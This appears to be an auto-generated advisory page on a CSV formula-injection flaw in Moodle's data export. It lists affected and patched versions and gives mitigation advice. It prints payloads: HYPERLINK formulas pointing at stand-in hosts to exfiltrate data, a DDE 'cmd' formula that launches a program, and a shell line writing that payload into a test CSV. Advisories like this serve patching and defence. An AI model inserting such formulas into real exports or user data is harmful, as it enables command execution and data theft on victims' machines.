Moodle, Formula Injection Vulnerability, CVE-2026-????? (Moderate)

Listen to this Post

The vulnerability is a classic CSV formula injection flaw within Moodle’s data export functionality. When user-supplied data from activities like quizzes or databases is exported into a CSV file, the application fails to properly escape or sanitize cells that begin with specific characters, such as =, +, -, or @. An attacker can craft malicious input, like `=HYPERLINK(“http://evil.com”,”Click”)` or =cmd|' /C calc'!A0, which is then embedded into the exported spreadsheet cell. When a victim opens the generated CSV file in a spreadsheet application like Microsoft Excel or LibreOffice Calc, these cells are interpreted as executable formulas by default. This allows the attacker to trigger arbitrary commands, exfiltrate data via functions like HYPERLINK, or corrupt the spreadsheet’s data integrity, all without direct access to the Moodle server itself, relying on the victim’s interaction with the exported file.
Platform: Moodle
Version: <4.1.22, 4.4.0-4.4.11, 4.5.0-4.5.7, 5.0.0-5.0.3, 5.1.0-beta
Vulnerability: CSV Formula Injection
Severity: Moderate
date: 2026-02-03

Prediction: 2026-02-10

What Undercode Say:

Check local Moodle version
grep "\$release" version.php
Search code for export functions
grep -r "export.csv" path/to/moodle/
Simulate malicious payload
echo '=cmd|\" /C calc\"!A0' >> test_export.csv

How Exploit:

  1. Attacker submits formula payload (e.g., =HYPERLINK("http://steal.data","OK")) into a user-input field.

2. Administrator exports site data to CSV.

  1. Victim opens CSV file; spreadsheet executes the embedded formula.

Protection from this CVE

Update to patched versions: 4.1.22, 4.4.12, 4.5.8, 5.0.4, 5.1.1. Implement output escaping for CSV special characters (=, +, -, @) by prepending a tab or single quote. Sanitize all user data before export.

Impact:

Data exfiltration via links. Spreadsheet command execution. Integrity loss.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top